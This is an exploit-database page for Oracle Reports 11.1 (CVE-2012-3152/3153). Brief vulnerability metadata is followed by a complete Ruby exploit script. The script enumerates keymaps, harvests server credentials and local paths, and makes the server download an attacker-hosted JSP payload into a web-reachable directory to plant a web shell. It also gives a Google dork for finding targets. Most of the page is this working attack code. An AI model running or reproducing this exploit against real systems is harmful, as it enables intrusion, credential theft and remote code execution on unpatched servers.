header-logo
Suggest Exploit
vendor:
Oracle Reports 11.1
by:
Mekanismen
7,5
CVSS
HIGH
CVE-2012-3153/CVE-2012-3152
20
CWE
Product Name: Oracle Reports 11.1
Affected Version From: 11.1
Affected Version To: 11.1
Patch Exists: YES
Related CWE: CVE-2012-3153, CVE-2012-3152
CPE: a:oracle:reports:11.1
Metasploit: N/A
Other Scripts: N/A
Tags: cve,cve2012,oracle,rce,edb
CVSS Metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
Nuclei References: https://nvd.nist.gov/vuln/detail/CVE-2012-3152https://www.exploit-db.com/exploits/31737https://www.oracle.com/security-alerts/cpuoct2012.htmlhttp://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.htmlhttp://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
Nuclei Metadata: {'max-request': 2, 'vendor': 'oracle', 'product': 'fusion_middleware'}
Platforms Tested: Linux
2014

Oracle Reports 11.1

An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknownvectors related to Report Server Component.

Mitigation:

Oracle has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/env ruby

# Exploit Title: Oracle Reports 11.1
# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
# Google Dork: inurl:/reports/rwservlet/
# Date: 01/28/2014
# Exploit Author: Mekanismen <mattias@gotroot.eu>
# Credits to: @miss_sudo for initial disclosure
# Reference: http://netinfiltration.com/
# Vendor Homepage: http://www.oracle.com/
# Version: 11.1
# Tested on: Linux
# CVE-2012-3153
# CVE-2012-3152

require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE

def upload_payload(dest)
  url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
  #print url 
  begin
  uri = URI.parse(url)
  html = uri.open.read
  rescue
    html = ""
  end
  
  if html =~ /Successfully run/
    @hacked = true
    print "[+] Payload uploaded!\n"
  else
    print "[-] Payload uploaded failed\n"
  end
end

def getenv(server, authid)
  print "[+] Found server: #{server}\n"
  print "[+] Found credentials: #{authid}\n"
  print "[*] Querying showenv ... \n"
  begin
    uri = URI.parse("#{@url}/reports/rwservlet/showenv?server=#{server}&authid=#{authid}")
    html = uri.open.read
  rescue
    html = ""
  end

  if html =~ /\/(.*)\/showenv/ 
    print "[+] Query succeeded, uploading payload ... \n"
    upload_payload($1)
  else
    print "[-] Query failed... \n"
  end
end

@payload_url = ""         #the url that holds our payload (we can execute .jsp on the server)
@url = ""                 #url to compromise
@hacked = false
@payload_name = (0...8).map { ('a'..'z').to_a[rand(26)] }.join + ".jsp" 

print "[*] PWNACLE Fusion - Mekanismen <mattias@gotroot.eu>\n"
print "[*] Automated exploit for CVE-2012-3152 / CVE-2012-3153\n"
print "[*] Credits to: @miss_sudo\n"

unless ARGV[0] and ARGV[1]
  print "[-] Usage: ./pwnacle.rb target_url payload_url\n"
  exit
end

@url =  ARGV[0]
@payload_url =  ARGV[1]
print "[*] Target URL: #{@url}\n"
print "[*] Payload URL: #{@payload_url}\n"
print "[*] Payload name: #{@payload_name}\n"

begin
#Can we view keymaps?
uri = URI.parse("#{@url}/reports/rwservlet/showmap")
html = uri.open.read
rescue
  print "[-] URL not vulnerable or unreachable\n"
  exit
end

test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten

#Parse keymaps for servers
print "[*] Enumerating keymaps ... \n"
test.each do |t|
  if not @hacked
    t = t.delete(' ')
    url = "#{@url}/reports/rwservlet/parsequery?#{t}"

  begin
    uri = URI.parse(url)
    html = uri.open.read
    rescue
  end
  
  #to automate exploitation we need to query showenv for a local path
  #we need a server id and creds for this, we enumerate the keymaps and hope for the best
  #showenv tells us the local PATH of /reports/ where we upload the shell
  #so we can reach it from /reports/images/<shell>.jsp 

  if html =~ /userid=(.*)@/
    authid = $1
  end
  if html =~ /server=(\S*)/ 
    server = $1
  end

  if server and authid
    getenv(server, authid)
  end
  else
    break
  end
end

if @hacked
  print "[*] Server hopefully compromised!\n"
  print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
else
  print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
  #server is still vulnerable but cannot be automatically exploited ... i guess
end

Navigation

Suggest Exploit

Services By CQR